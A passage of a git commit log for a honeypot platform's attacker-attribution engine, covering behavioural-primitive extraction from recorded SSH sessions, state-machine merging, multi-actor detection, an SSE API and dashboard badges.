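A dpkg.log line closing in `<none>` has neither the trailing space nor a PS1-shape token, so it no longer casts a vote.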
0c1fc68b13 feat(deploy): wire attribution worker — CLI + systemd unit + registry
* decnet attribution — Typer command mirroring decnet reuse-correlate
  (--multi-actor-tick, --daemon flags). Calls run_attribution_loop
  with the dependency-injected repo.
* deploy/decnet-attribution.service.j2 — systemd unit mirroring
  decnet-reuse-correlator.service.j2: ExecStart=decnet attribution,
  same hardening posture (NoNewPrivileges, ProtectSystem=full,
  ProtectHome=read-only, dedicated /var/log/decnet/decnet.attribution.log).
* worker_registry.KNOWN_WORKERS += "attribution" — heartbeat already
  publishes as system.attribution.health from
  attribution_worker._WORKER_NAME, so the Workers panel surfaces the
  row the moment the unit is enabled.
* api_start_all_workers preferred-order list gains "attribution"
  between reuse-correlator and enrich so a fresh start-all brings it
  up alongside its peers.

After this commit `systemctl enable --now decnet-attribution` (or
the dashboard's start-all) actually launches the engine.
2026-05-09 02:31:59 -04:00
5253b32319 feat(decnet_web/AttackerDetail): attribution state badges (Phase 6)
Per-primitive state badge rendered next to each value in the
Behavioural Primitives panel. Five-state vocabulary, frozen, mirrors
decnet/correlation/attribution/aggregate.py:

  * STABLE      — green, low-key
  * DRIFTING    — amber, draws the eye
  * CONFLICTED  — red
  * MULTI-ACTOR — purple, loudest (cross-primitive escalation lives
                  in attribution.multi_actor_suspected, not the
                  per-primitive badge)
  * UNKNOWN     — neutral border, no fill

Wiring:

* GET /api/v1/attackers/{id}/attribution on mount + on id change.
  Failures swallowed silently (the worker may be off in dev).
* useAttackerStream gains attribution.state_changed +
  attribution.multi_actor_suspected named events. The state-changed
  handler merges by primitive and locks last_change_ts when the
  state did not actually flip (defensive — backend already gates
  these on transition, but a future relaxation shouldn't lie about
  "stable since X" on the badge tooltip).
* multi_actor_suspected is wired but unused by the badges; the
  per-primitive multi_actor signal already shows on each contributing
  primitive. The handler is in place so a future "two operators
  detected" banner has a live source.

Vitest: 3 new tests (badge renders only for mapped primitives, all
five states render with distinct labels, no badge when prop omitted)
on top of the existing 4. 7 of 7 pass; tsc + vite build clean.
2026-05-09 02:28:11 -04:00
5de4b5e290 feat(decnet_web/AttackerDetail): visual refresh of Behavioural Primitives panel
* Per-domain icons (Keyboard / Cpu / Clock / Activity / Globe / Sparkles).
* Domain headers use BEHAVIOUR_DOMAIN_LABELS with letter-spacing +
  primitive-count badge on the right.
* Bordered domain groups instead of flat list; aligned leaf / value /
  confidence columns with monospace value rendering.
* Section title: BEHAVIOURAL PRIMITIVES -> BEHAVE PRIMITIVES (matches
  the BEHAVE-SHELL extractor naming).
2026-05-09 02:24:37 -04:00
9cc3272a0d test(correlation/attribution): v0 calibration lockdown (Phase 7)
Four synthetic operator-behaviour scenarios at the merger level
(aggregate_observations) that pin v0's calibration:

* Stable HUMAN over 7 sessions   -> all primitives stable
* HUMAN switches to LLM mid-week -> primitives flip stable -> drifting
* Two operators alternating      -> primitives flag multi_actor
                                    (per-primitive; the cross-
                                    primitive multi_actor_suspected
                                    correlator is exercised by Phase 5)
* Single short session           -> all primitives unknown

Plus a threshold-lockdown test that asserts every named constant in
_thresholds.py against its v0 ship value. Anyone adjusting a
threshold without updating the scenarios fails this file.

This closes DEBT-051 at v0 — the attribution engine has a calibrated,
test-locked answer to "is this attacker stable / drifting / showing
multiple operators?" without crossing the persona-attribution bright
line. v1 (cross-attacker clustering, KD simhash linkage signal) is
gated on this v0 surface being stable in production for >= 1 month.
2026-05-09 02:23:10 -04:00
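The threshold-lockdown idea can be sketched as a comparison between a module's constants and a frozen table of ship values. Everything here is an assumption for illustration: the `SimpleNamespace` stands in for `_thresholds.py`, only constants whose values appear elsewhere in this log are listed, and `MULTI_ACTOR_MIN_PRIMITIVES = 2` is inferred from the ">= 2 primitives" filter rather than quoted.

```python
from types import SimpleNamespace

# Stand-in for the real _thresholds module (hypothetical contents).
thresholds = SimpleNamespace(
    MULTI_ACTOR_MAX_CONFIDENCE=0.6,
    MULTI_ACTOR_TICK_SECS=60,
    MULTI_ACTOR_MIN_PRIMITIVES=2,
)

# Frozen v0 ship values the lockdown test compares against.
V0_SHIP_VALUES = {
    "MULTI_ACTOR_MAX_CONFIDENCE": 0.6,
    "MULTI_ACTOR_TICK_SECS": 60,
    "MULTI_ACTOR_MIN_PRIMITIVES": 2,
}


def threshold_mismatches(module, expected):
    """Map each drifted constant to its (actual, expected) pair."""
    mismatches = {}
    for name, want in expected.items():
        got = getattr(module, name, None)
        if got != want:
            mismatches[name] = (got, want)
    return mismatches
```

A lockdown test would then assert that `threshold_mismatches(thresholds, V0_SHIP_VALUES)` is empty, so any retuned constant fails loudly alongside the scenarios it affects.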
33f7d5a9ff feat(web): expose attribution state on AttackerDetail backend (Phase 6)
GET /api/v1/attackers/{uuid}/attribution

Returns the merger output for an attacker's identity:

    {
        "identity_uuid": "abc..." | null,
        "primitives": [
            {primitive, current_value, state, confidence,
             observation_count, last_change_ts, last_observation_ts},
            ...
        ]
    }

Pre-attribution-worker: identity_uuid=null, primitives=[]. Surfacing
identity_uuid keeps the cross-attacker rollup story visible to the
frontend ahead of v1's clusterer landing.

api_events SSE relay also subscribes to attribution.> and forwards
to the AttackerDetail page filtered on payload.identity_uuid (the
identity is resolved at stream open from the URL's attacker_uuid;
attribution payloads are identity-keyed, not attacker-keyed). New
SSE event names: attribution.state_changed,
attribution.multi_actor_suspected.

Frontend (AttackerDetail.tsx badge rendering, useAttackerStream
consumer) deferred — there's already WIP on AttackerDetail.tsx in
the working tree; merging the badge logic is a separate commit
once that lands.

Tests: 4 endpoint scenarios — 401 unauth, 404 unknown attacker,
200 empty (no stub), 200 with primitive-ordered rows.
2026-05-09 02:21:59 -04:00
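A rough sketch of how the response body above might be assembled from state rows. `build_attribution_response` is a hypothetical helper, and sorting by primitive name is an assumption drawn from the "primitive-ordered rows" test description.

```python
_FIELDS = (
    "primitive", "current_value", "state", "confidence",
    "observation_count", "last_change_ts", "last_observation_ts",
)


def build_attribution_response(identity_uuid, rows):
    """rows: iterable of dicts, one per (identity, primitive) state row."""
    primitives = [
        {name: row.get(name) for name in _FIELDS}
        # Assumption: rows are returned ordered by primitive name.
        for row in sorted(rows, key=lambda r: r["primitive"])
    ]
    return {"identity_uuid": identity_uuid, "primitives": primitives}


# Pre-attribution-worker shape: no identity, no primitives.
empty = build_attribution_response(None, [])
```

Returning the same envelope in the empty case means the frontend does not need a separate code path for attackers the worker has not seen yet.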
e2c7e16793 feat(correlation/attribution): cross-primitive multi-actor detection (Phase 5)
Add tick_multi_actor() — periodic walk of attribution_state firing
attribution.profile.multi_actor_suspected when an identity carries
>= MULTI_ACTOR_MIN_PRIMITIVES rows in multi_actor state.

* Repo's list_multi_actor_identities() already filters to >= 2
  primitives; the correlator just dispatches.
* In-memory dedup keyed on identity_uuid -> frozenset(primitives):
  same set as last fire -> no re-emit. Set grows -> re-emit.
  Set shrinks below threshold -> evict so a future re-flap re-fires.
  Restart-resets are honest because attribution_state persists; a
  v1 multi_actor_suspect_log table can replace this if needed.
* run_attribution_loop() now supervises three concurrent tasks:
  observation handler, multi_actor tick loop, health/control. Tick
  interval comes from _thresholds.MULTI_ACTOR_TICK_SECS (60s) with
  test override.

Tests: 6 scenarios — single-primitive doesn't fire, two-primitive
co-flag fires, dedup blocks unchanged set, set growth re-fires,
threshold drop re-arms, multiple identities fire independently.
2026-05-09 02:18:42 -04:00
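The in-memory dedup described above can be sketched as a dict from identity to the last-fired frozenset. This is an illustration under assumptions, not the worker's code: `MultiActorDedup` is a hypothetical name, the threshold of 2 is inferred from the repo filter, and any change to the flagged set is treated as a re-emit (the commit only spells out the "grows" case).

```python
MULTI_ACTOR_MIN_PRIMITIVES = 2  # inferred from the ">= 2 primitives" filter


class MultiActorDedup:
    """Remember which primitive set last fired for each identity."""

    def __init__(self):
        self._last_fired = {}

    def should_fire(self, identity_uuid, primitives):
        current = frozenset(primitives)
        if len(current) < MULTI_ACTOR_MIN_PRIMITIVES:
            # Below threshold: evict so a later re-flap fires again.
            self._last_fired.pop(identity_uuid, None)
            return False
        if self._last_fired.get(identity_uuid) == current:
            # Same set as the last fire: suppress the duplicate.
            return False
        self._last_fired[identity_uuid] = current
        return True
```

Because the cache lives in memory, a restart simply re-fires once per still-flagged identity, which matches the "restart-resets are honest" note in the commit.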
dd265d7520 feat(correlation/attribution): wire bus handler, persist state (Phase 4)
attribution_worker.handle_observation_event now executes the full
end-to-end path:

* ensure stub identity (Phase 1)
* observations_for_identity_primitive() — new repo helper joining
  observations through attackers.identity_id, so v1's clusterer
  gets cross-attacker rollup for free
* aggregate_observations() with ValueKind dispatched off the BEHAVE
  PRIMITIVE_REGISTRY; unknown primitives default to categorical
* upsert_attribution_state() — last_change_ts locked when state is
  unchanged so the dashboard can render "stable since X"
* publish attribution.profile.state_changed only on transition;
  idempotent re-runs over the same observation set fire nothing
  (loop-prevention invariant matching ttp.tagged)

Tests:
* 5 end-to-end attribution scenarios over in-memory SQLite + FakeBus.
* test_base_repo's DummyRepo + coverage body now stub every abstract
  surface BaseRepository declares — the 6 added by this branch plus
  the 12 left un-stubbed by earlier work (BEHAVE Phase 1, TTP
  rollups, iter helpers). Previously the coverage test could not
  even instantiate DummyRepo.
* test_aggregate_categorical's dispatcher rejection updated for the
  Phase 3 + 4 contract — ValueError on unknown kinds, not
  NotImplementedError.
2026-05-09 02:16:12 -04:00
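The "lock last_change_ts, publish only on transition" behaviour can be sketched with a plain dict as the state table and a list as the bus. `record_state` and the payload shape are hypothetical, and treating the first write for a key as a transition is an assumption.

```python
def record_state(store, bus, identity_uuid, primitive, new_state, now):
    """Upsert one state row; publish only when the state actually flips."""
    key = (identity_uuid, primitive)
    previous = store.get(key)
    # Assumption: the first row for a key counts as a transition.
    changed = previous is None or previous["state"] != new_state
    store[key] = {
        "state": new_state,
        # Locked when unchanged, so "stable since X" stays truthful.
        "last_change_ts": now if changed else previous["last_change_ts"],
        "last_observation_ts": now,
    }
    if changed:
        bus.append((
            "attribution.profile.state_changed",
            {"identity_uuid": identity_uuid,
             "primitive": primitive,
             "state": new_state},
        ))
    return changed
```

Re-running the handler over the same observations leaves the bus untouched, which is the loop-prevention property the commit calls out.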
c39802a4bb feat(correlation/attribution): hash + numeric merge functions (Phase 3)
aggregate_numeric(): EWMA + dispersion (CV) over numeric primitive
values. Stable when CV < 20% AND mean shift < 30%; drifting on >= 30%
mean shift; conflicted on CV > 100%. Confidence is 1 - min(CV, 1).
multi_actor is intentionally NOT a numeric state — bimodal
distributions belong to the categorical detector once the value space
is bucketed.

aggregate_hash(): counts distinct hash values within
HASH_DRIFT_WINDOW_SECS of the most recent observation. 0 rotations =
stable, 1..HASH_DRIFT_MAX = drifting, > HASH_DRIFT_MAX = conflicted.
Reads rotation events; never recomputes hashes (DEBT-032 already
produces them via decnet.correlation.fingerprint_rotation).

aggregate_observations() dispatcher now routes "categorical" |
"numeric" | "hash" | None and rejects unknown kinds with ValueError
(louder than NotImplementedError now that all three v0 mergers
exist). 17 synthetic-input tests cover both new mergers and the
dispatcher.
2026-05-09 01:59:11 -04:00
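A sketch of the two mergers above under stated assumptions. The percentage cut-offs come from the commit message; everything else is guessed for illustration: the EWMA alpha, the hash window and rotation limit, measuring "mean shift" as the EWMA against the mean of the older half, checking conflicted before drifting, returning "unknown" for the CV band the message leaves unspecified, and counting rotations as distinct hashes minus one.

```python
import statistics

# Cut-offs from the commit message, as fractions.
CV_STABLE_MAX = 0.20
CV_CONFLICTED_MIN = 1.00
MEAN_SHIFT_DRIFT = 0.30
# Hypothetical values; the real constants live in _thresholds.py.
EWMA_ALPHA = 0.3
HASH_DRIFT_WINDOW_SECS = 3600
HASH_DRIFT_MAX = 2


def ewma(values, alpha=EWMA_ALPHA):
    """Exponentially weighted moving average, oldest to newest."""
    acc = values[0]
    for value in values[1:]:
        acc = alpha * value + (1 - alpha) * acc
    return acc


def classify_numeric(values):
    """Return (state, confidence) for oldest-to-newest numeric values."""
    if len(values) < 2:
        return "unknown", 0.0
    mean = statistics.fmean(values)
    baseline = statistics.fmean(values[: len(values) // 2])
    if mean == 0 or baseline == 0:
        return "unknown", 0.0
    cv = statistics.pstdev(values) / abs(mean)
    shift = abs(ewma(values) - baseline) / abs(baseline)
    confidence = 1.0 - min(cv, 1.0)
    if cv > CV_CONFLICTED_MIN:
        return "conflicted", confidence
    if shift >= MEAN_SHIFT_DRIFT:
        return "drifting", confidence
    if cv < CV_STABLE_MAX:
        return "stable", confidence
    return "unknown", confidence  # band not specified in the commit


def classify_hash(observations, window_secs=HASH_DRIFT_WINDOW_SECS,
                  max_rotations=HASH_DRIFT_MAX):
    """observations: list of (timestamp_secs, hash_value) pairs."""
    if not observations:
        return "unknown"
    latest = max(ts for ts, _ in observations)
    recent = {h for ts, h in observations if latest - ts <= window_secs}
    rotations = len(recent) - 1
    if rotations == 0:
        return "stable"
    return "drifting" if rotations <= max_rotations else "conflicted"
```

Note that `classify_hash` only compares values it is handed; like the merger in the commit, it never recomputes a hash.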
4956977739 feat(correlation/attribution): categorical merge state machine (Phase 2)
aggregate_categorical(): pure function over a per-(identity, primitive)
observation list. Five-state vocabulary, last-N=5 window comparison
with one-outlier-tolerant majority threshold:

* unknown — < 3 observations
* stable — recent 5 agree (≥ 4 of 5 share top value), older 5 same
* drifting — recent 5 stable but disagrees with older 5, or older
  was conflicted and recent stabilised
* conflicted — recent 5 split, no two-value alternation pattern
* multi_actor — recent 5 split + alternation between exactly two
  values (operator A↔B handoff). Confidence capped at 0.6 per
  _thresholds.MULTI_ACTOR_MAX_CONFIDENCE; flapping primitives on
  flaky networks would otherwise look like two operators.

aggregate_observations() dispatcher honours value_kind="categorical"
(or None) and raises NotImplementedError for "numeric" / "hash" so
Phase 3 lands cleanly. 14 synthetic-input tests cover every state
+ boundary condition.
2026-05-08 23:18:22 -04:00
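The five-state rules above can be sketched as a pure function over an oldest-to-newest value list. This is one possible reading, not the shipped `aggregate_categorical()`: the function name is hypothetical, "alternation" is taken to mean exactly two values with at least two switches, windows shorter than five reuse the one-outlier tolerance, and confidence is simply the top value's share of the recent window.

```python
from collections import Counter

MULTI_ACTOR_MAX_CONFIDENCE = 0.6  # cap stated in the commit message
MIN_OBSERVATIONS = 3              # fewer than this is "unknown"
WINDOW = 5                        # last-N window size


def _top(window):
    """Most common value in the window and its count."""
    return Counter(window).most_common(1)[0]


def _agrees(window):
    # One-outlier tolerance: 4 of 5 for a full window.
    return _top(window)[1] >= len(window) - 1


def _alternates(window):
    # Assumption: exactly two values and at least two switches.
    if len(set(window)) != 2:
        return False
    switches = sum(1 for a, b in zip(window, window[1:]) if a != b)
    return switches >= 2


def classify_categorical(values):
    """Return (state, confidence) for one (identity, primitive) series."""
    if len(values) < MIN_OBSERVATIONS:
        return "unknown", 0.0
    recent = values[-WINDOW:]
    older = values[-2 * WINDOW:-WINDOW]
    top_value, top_count = _top(recent)
    share = top_count / len(recent)
    if _agrees(recent):
        if not older:
            return "stable", share
        if _agrees(older) and _top(older)[0] == top_value:
            return "stable", share
        # Older window disagreed or was itself split.
        return "drifting", share
    if _alternates(recent):
        return "multi_actor", min(share, MULTI_ACTOR_MAX_CONFIDENCE)
    return "conflicted", share
```

For example, `classify_categorical(["HUMAN"] * 5 + ["LLM"] * 5)` reports drifting, because the recent window agrees on a value that the older window does not share.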
c2891d6cca feat(correlation/attribution): substrate + idle handler (Phase 1)
v0 Phase 1 of ATTRIBUTION-ENGINE.md:

* AttributionStateRow SQLModel keyed on (identity_uuid, primitive)
  per ANTI direction — re-keying state rows when the v1 clusterer
  merges attackers is the migration debt v0 should not bake in.
  ATTRIBUTION-ENGINE.md updated with the deviation note.
* AttributionMixin: ensure_stub_identity_for_attacker, idempotent
  upsert_attribution_state, get_attribution_state[_for_identity],
  list_multi_actor_identities (the Phase 5 correlator's read).
* attribution.profile.{state_changed,multi_actor_suspected} bus
  topics + builder; wiki Service-Bus.md updated separately.
* attribution_worker.py: subscribes to attacker.observation.>,
  ensures stub identity per event, logs and continues. No merger,
  no state writes, no derived events — Phase 4 wires those.
* attribution/{aggregate.py,_thresholds.py} skeletons: Phase 2
  fills _aggregate_categorical, Phase 3 adds numeric+hash+dispatcher.
2026-05-08 23:16:13 -04:00
e94ab608d9 fix(profiler/behave_shell): tolerate non-UTF-8 bytes in shard reads
Real-world bug surfaced on the first live decky run: sessrec.c's
json_escape (decnet/templates/_shared/sessrec/sessrec.c:111-141)
only escapes bytes < 0x20 + DEL — bytes >= 0x80 pass through raw.
An attacker pasting Latin-1 / GB18030 / any non-UTF-8 8-bit text
yields a shard line that chokes Python's default UTF-8 text-mode
read with 'utf-8 codec can't decode byte 0xac'.

Three changes:

1. _events_for_sid now opens with errors='surrogateescape', preserving
   byte fidelity through the JSON parse. Surrogate-half chars
   correctly fail isascii() / isalpha() so the typed-letter
   histograms filter them out automatically. Tightening sessrec.c to
   escape >= 0x80 is filed for v0.2 — that's the proper forensic-data
   fix; the surrogateescape read makes the engine robust meanwhile.

2. Regression test
   (test_handler_tolerates_non_utf8_bytes_in_shard) builds a shard
   with raw 0xAC bytes inside a JSON 'data' string and asserts the
   handler still persists observations.

3. Collector's _emit_session now logs at WARNING (was DEBUG) when
   find_shard_with_sid returns None, citing the three usual causes
   (ARTIFACTS_ROOT perms, _SERVICE_RE whitelist, sessrec/collector
   race). Surfaces the silent-skip class of bug in seconds instead of
   hours — the first live run hid a perm mismatch
   (User=anti without SupplementaryGroups=decnet) for an entire
   session window before the symptom was traced upstream.
2026-05-08 22:52:46 -04:00
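The surrogateescape read from change 1 of the commit above can be demonstrated in isolation. This is a minimal sketch, assuming one JSON value per shard line. read_shard_events, count_typed_letters, and demo are hypothetical helpers, not the project's _events_for_sid.

```python
import json
import os
import tempfile


def read_shard_events(path):
    """Parse one JSON value per line, keeping undecodable bytes as surrogates."""
    events = []
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        for line in fh:
            line = line.strip()
            if line:
                events.append(json.loads(line))
    return events


def count_typed_letters(text):
    # Surrogate halves fail isascii() and isalpha(), so they drop out here.
    return sum(1 for ch in text if ch.isascii() and ch.isalpha())


def demo():
    """Write a line holding a raw 0xAC byte, then read it back."""
    raw = b'{"data": "ls \xac -la"}\n'
    with tempfile.NamedTemporaryFile(delete=False, suffix=".jsonl") as tmp:
        tmp.write(raw)
    try:
        return read_shard_events(tmp.name)
    finally:
        os.unlink(tmp.name)
```

The 0xAC byte comes back as the lone surrogate U+DCAC, so the original bytes can still be recovered by encoding with the same error handler.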
69c8cfd2b9 test(profiler/behave_shell): Phase 6 smoke harness + live-decky runbook
Two-half deliverable per BEHAVE-INTEGRATION.md §587-594:

* scripts/behave_shell/replay_calibration.py — Python helper that
  drives the production handler against one asciinema shard, mints
  a temp SQLite repo + an Attacker per session, captures bus
  emissions in-process. Exits non-zero on zero-observation sessions.

* scripts/behave_shell/smoke.sh — bash entry that replays all five
  2026-05-02 calibration shards (HUMAN / YOU-sim / LW-sim /
  CLAUDE-FF / CLAUDE-CL). Auto-activates .311 venv, forces
  DECNET_DB_TYPE=sqlite, prints per-class summary. Suitable for CI.

* scripts/behave_shell/README.md — runbook covering both halves.
  Pins the manual live-decky procedure (one SSH session per class
  against a deployed smoke-decky, expected dominant primitives table,
  SQL verification query, AttackerDetail panel check, pass criteria).

* BEHAVE-INTEGRATION.md — Phase 6 completion log appended with
  current corpus results table (15 sessions, 424 observations across
  the five classes) and a note that the v0 tag (drop -pre) is gated
  on the manual live-decky round-trip and lands as a separate
  commit.

Live-decky run is intentionally NOT scripted — the integration doc
calls for manual SSH sessions per class so an operator confirms the
bus / collector / disk-reach plumbing under real PTY conditions.
2026-05-08 21:42:11 -04:00
b3ff80d74e test(decnet_web): vitest coverage for Behavioural primitives panel
Four tests pin the panel surface:
* Empty-state placeholder renders when no observations.
* Day-one priority primitives sort to the top of their group:
  motor.input_modality first in motor; the three cognitive priority
  primitives in documented order at the top of cognitive.
* Each row renders primitive leaf, value, and confidence-percent
  badge.
* Groups follow the canonical domain order
  (motor / cognitive / temporal / operational / environmental /
  emotional_valence); unknown domains alphabetise at the end.

Mirrors the Orchestrator.test.tsx harness shape (DEBT-043). Live
update path (useAttackerStream → setObservations) is exercised
indirectly via the static render — the hook is dumb glue and the
state mutation is React-side.
2026-05-08 20:27:40 -04:00
7634e31e5a feat(decnet_web/AttackerDetail): Behavioural primitives panel
Adds the AttackerDetail.tsx panel that surfaces BEHAVE-SHELL
behavioural primitives. Hydrates from the existing
GET /api/v1/attackers/{uuid} response field 'observations',
live-updates via the new useAttackerStream hook (replace-by-primitive
on every 'observation' SSE event).

* New BehaviouralPrimitivesPanel component, exported for vitest.
* Day-one render priority per BEHAVE-INTEGRATION.md §441-454:
  motor.input_modality, cognitive.feedback_loop_engagement,
  cognitive.command_branch_diversity,
  cognitive.inter_command_latency_class — these four sort to the top
  of their respective groups; everything else alphabetises.
* Grouped by top-level domain (motor / cognitive / temporal /
  operational / environmental / emotional_valence) with the canonical
  domain order; unknown domains alphabetise at the end.
* AttackerData interface gains an 'observations' field.
* Empty-state placeholder when the panel has nothing yet.
* Section collapse state extends to 'behavioural', defaults open.

tsc --noEmit clean. Vitest coverage ships in P5.4.
2026-05-08 20:26:55 -04:00
2ff2537f6c feat(decnet_web): useAttackerStream React hook
Per-attacker SSE consumer hook. Mirrors useIdentityStream's shape:
* Connects to /api/v1/attackers/{uuid}/events with ?token= auth.
* Per-event-name dispatch via addEventListener for snapshot,
  observation, fingerprint.rotated, attacker.scored.
* Reconnect-on-error backoff (3s).
* Callback refs so consumer rerenders don't tear down the connection.

The 'observation' event handler receives every primitive's update
through one event name; the primitive rides in payload.primitive
(matches the backend's _sse_name_for collapse decision).

Hook coverage rides on P5.4's panel test.
2026-05-08 20:24:19 -04:00
bb77d13f9a feat(api/attackers): per-attacker SSE events stream
GET /api/v1/attackers/{uuid}/events streams behavioural events for
one attacker. Mirrors decnet/web/router/topology/api_events.py
end-to-end: ?token= auth, require_stream_viewer gate,
sse_connection_slot per-user cap, snapshot-on-connect, three bus
subscriptions (attacker.observation.>, attacker.fingerprint_rotated,
attacker.scored) merged through asyncio.Queue, 15s keepalive,
request.is_disconnected() exit, finally task cancellation.

Per-attacker filter keys on payload['attacker_uuid'] which the
profiler worker stamps onto every published payload (Phase 5 P5.0
amendment) — O(1) drop without a repo round-trip per event.

_sse_name_for derives SSE event names:
  attacker.observation.<primitive> → observation.<primitive>
  attacker.fingerprint_rotated     → fingerprint.rotated
  attacker.scored                  → attacker.scored

10 tests cover snapshot, live forward, per-attacker filter (drops
other attackers' events), fingerprint.rotated forward, 404, 401, and
the sse-name derivation across all four cases. Topology events
regression green.
2026-05-08 20:23:29 -04:00
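The three topic-to-event mappings listed in the commit above can be written as a small pure function. This sketch follows that table only. The name sse_name_for, the None return for unrecognised topics, and the handling of an empty primitive suffix are assumptions, and the real _sse_name_for may differ.

```python
from typing import Optional

_OBSERVATION_PREFIX = "attacker.observation."


def sse_name_for(topic: str) -> Optional[str]:
    """Derive an SSE event name from a bus topic, per the commit's table."""
    if topic.startswith(_OBSERVATION_PREFIX):
        primitive = topic[len(_OBSERVATION_PREFIX):]
        return f"observation.{primitive}" if primitive else None
    if topic == "attacker.fingerprint_rotated":
        return "fingerprint.rotated"
    if topic == "attacker.scored":
        return "attacker.scored"
    return None  # assumption: unrecognised topics are not forwarded
```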
5116023bf7 feat(profiler/behave_shell): stamp attacker_uuid on bus payload (Phase 5 prep)
The profiler worker's per-observation publish now re-merges
attacker_uuid into the bus payload alongside id/ts/v. Same shape as
the existing DECNET-side deviation from BEHAVE's wire-format
docstring (BEHAVE-INTEGRATION.md §339-366) — widens the deviation
by one DECNET denorm field.

Phase 5's per-attacker SSE route can now filter
attacker.observation.* events to one attacker in O(1) without a repo
round-trip per event. identity_ref stays None today (until the
attribution engine ships); attacker_uuid is independent.

Two test changes:
* test_happy_path_persists_and_publishes asserts attacker_uuid is in
  every published payload.
* New test_attacker_uuid_in_payload_for_filter pins the field
  explicitly and confirms it doesn't conflate with identity_ref.
2026-05-08 20:18:32 -04:00
5ff89eefe7 feat(profiler): wire BEHAVE-SHELL extraction onto attacker.session.ended
The profiler worker now consumes attacker.session.ended on the bus
AND walks unprofiled session_recorded log rows on every tick. Both
paths converge on a single handler that:

1. Validates required payload fields (session_id, decky_id, service,
   attacker_ip, shard_path).
2. Builds evidence_ref shard:{decky}/{service}/{shard_basename}#{sid}
   and skips when has_observations_for_evidence is True (idempotent
   re-runs).
3. Resolves attacker_uuid via get_attacker_uuid_by_ip; defers if the
   profiler tick hasn't materialised the row yet.
4. Reads the asciinema shard, slices events for the sid, calls
   extract_session, persists each Observation via upsert_observation
   (per-row; batch transaction filed as follow-up), then publishes
   each on the bus best-effort (fire-and-forget per DEBT-029 §6).

Architecture:
* Handler lives in decnet/profiler/behave_shell/_handler.py — pure
  function, unit-tested in isolation.
* Worker.py adds _behave_pump (queue feed), _drain_behave_queue
  (per-tick drain), _behave_poll_tick (cursor scan over
  session_recorded logs), and _payload_from_log_row (Log → bus-shape
  payload projection).
* Poll cursor uses a separate state key
  (attacker_worker_session_cursor) so the correlation tick's cursor
  doesn't conflate.
* has_observations_for_evidence promoted to BaseRepository abstract.

22 new tests across handler / drain / poll layers covering happy
path, all skip paths, isolation against handler exceptions,
idempotency on re-run, and cursor key separation. TTP worker bus
tests still green — payload field is purely additive.

Closes BEHAVE-INTEGRATION.md Phase 4.
2026-05-08 18:57:45 -04:00
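Steps 1 and 2 of the handler in the commit above (field validation and the evidence_ref format) could look roughly like this. The required field names and the shard:{decky}/{service}/{shard_basename}#{sid} layout come from the commit message. The helper names and the choice to treat empty values as missing are assumptions.

```python
import posixpath
from typing import List, Mapping, Optional

REQUIRED_FIELDS = ("session_id", "decky_id", "service", "attacker_ip", "shard_path")


def missing_fields(payload: Mapping[str, object]) -> List[str]:
    """Return required keys that are absent or empty (assumed equivalent)."""
    return [key for key in REQUIRED_FIELDS if not payload.get(key)]


def build_evidence_ref(payload: Mapping[str, str]) -> Optional[str]:
    """Build the evidence reference, or None when the payload is incomplete."""
    if missing_fields(payload):
        return None
    basename = posixpath.basename(payload["shard_path"])
    return (
        f"shard:{payload['decky_id']}/{payload['service']}/"
        f"{basename}#{payload['session_id']}"
    )
```

Because the reference is derived only from the payload, a re-run over the same session produces the same string, which is what makes the has_observations_for_evidence skip idempotent.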
834aa613b1 feat(pyproject): pin decnet-behave-{core,shell} >=0.1.0,<0.2
Lock the BEHAVE library versions per BEHAVE-INTEGRATION.md
§Versioning. The profiler worker (Phase 4 wiring) imports
`Observation`/`Window` from `decnet_behave_core.spec.envelope` and
`event_topic_for`/`to_event_payload` from
`decnet_behave_shell.spec.event_adapter`; without the pin a broken
wheel or missing install would only show up on first publish.

Four-test smoke pins the public surface: envelope construction,
registry import non-empty, event-adapter topic shape, and the
adapter's id/ts/v exclusion contract.
2026-05-08 18:51:30 -04:00
bf3f9c746a feat(collector): enrich attacker.session.ended payload with shard_path
The collector's _SessionAggregator now resolves the asciinema shard
via find_shard_with_sid and stamps it onto every emitted
attacker.session.ended payload as `shard_path`. None when the shard
isn't on disk yet (collector race with sessrec flush) — consumers
treat that as "skip until next tick".

Additive field; existing TTP worker consumes the same topic and
ignores unknown keys, so no payload-version bump needed. Two new
tests pin the shard-found and shard-missing cases.

Unblocks BEHAVE-INTEGRATION Phase 4: the profiler worker reads
shard_path directly from the payload instead of disk-reaching.
2026-05-08 18:50:45 -04:00
588ea4e411 refactor(artifacts): extract shard-finder out of transcripts router
Move `_find_shard_with_sid`, `_resolve_shard`, `_validate_names`,
`_get_index`, and the index cache from
`decnet/web/router/transcripts/api_get_transcript.py` into
`decnet/artifacts/shards.py`. The shared module speaks
`ValueError`; the router keeps thin wrappers that translate to
`HTTPException(400)` so the route's error UX is unchanged.

This unblocks the BEHAVE-INTEGRATION Phase 4 worker wiring — the
profiler worker (and the collector's session aggregator) need to
disk-reach asciinema shards but must not import from a FastAPI
router.

11 new unit tests for the shared helper. Existing transcript router
tests pass (the shard fixture's monkeypatch points at the shared
module's ARTIFACTS_ROOT now).
2026-05-08 18:49:11 -04:00
aba1e37389 feat(profiler/behave_shell): H.5-pre extractor version marker (0.1.0-pre)
decnet.profiler.behave_shell.__version__ = '0.1.0-pre'.

The -pre suffix is honest: the extractor is feature-complete (37/37
Tier-A primitives emit, calibration grid honest), but the engine
package — worker wiring, observations writes, AttackerDetail panel —
still rides BEHAVE-INTEGRATION.md Phase 4. The actual 0.1.0 tag
lands when Phase 4 lands.

The marker version-tracks the engine, not the spec library
(decnet-behave-shell already at 0.1.0); they version independently.
2026-05-08 18:34:23 -04:00
9ebaca410a test(profiler/behave_shell): H.2 calibration grid full sweep
Run the five-class calibration grid (HUMAN / YOU-sim / LW-sim /
CLAUDE-FF / CLAUDE-CL) against the 2026-05-02 shards.

* Hard gate green for 27 primitives across all 5 shards.
* environmental.keyboard_layout moved from hard gate to
  PHASE_F_CONDITIONAL_PRIMITIVES — short SSH-recon corpus maxes at
  ~90 typed letters per session, well below the LAYOUT_MIN_TYPED_LETTERS
  (200) floor. The 200-floor stays per the per-phase "v0 ships when
  honest" rule; longer-text corpora will surface the layout signal.
* Three primitives never fire on the 2026-05-02 corpus, all already
  conditional and all expected:
  - cognitive.error_resilience.frustration_typing
  - environmental.locale
  - environmental.keyboard_layout

No D / F / G threshold re-tunes needed; only the keyboard_layout
binding-set move. Phase H step log appended to BEHAVE-EXTRACTOR.md
with per-class observation counts.
2026-05-08 18:33:51 -04:00
ac04751c18 test(profiler/behave_shell): H.1 registry-coverage test
Static assertion that every Tier-A primitive in PRIMITIVE_REGISTRY
has a slot in the calibration grid (hard gate or conditional set).
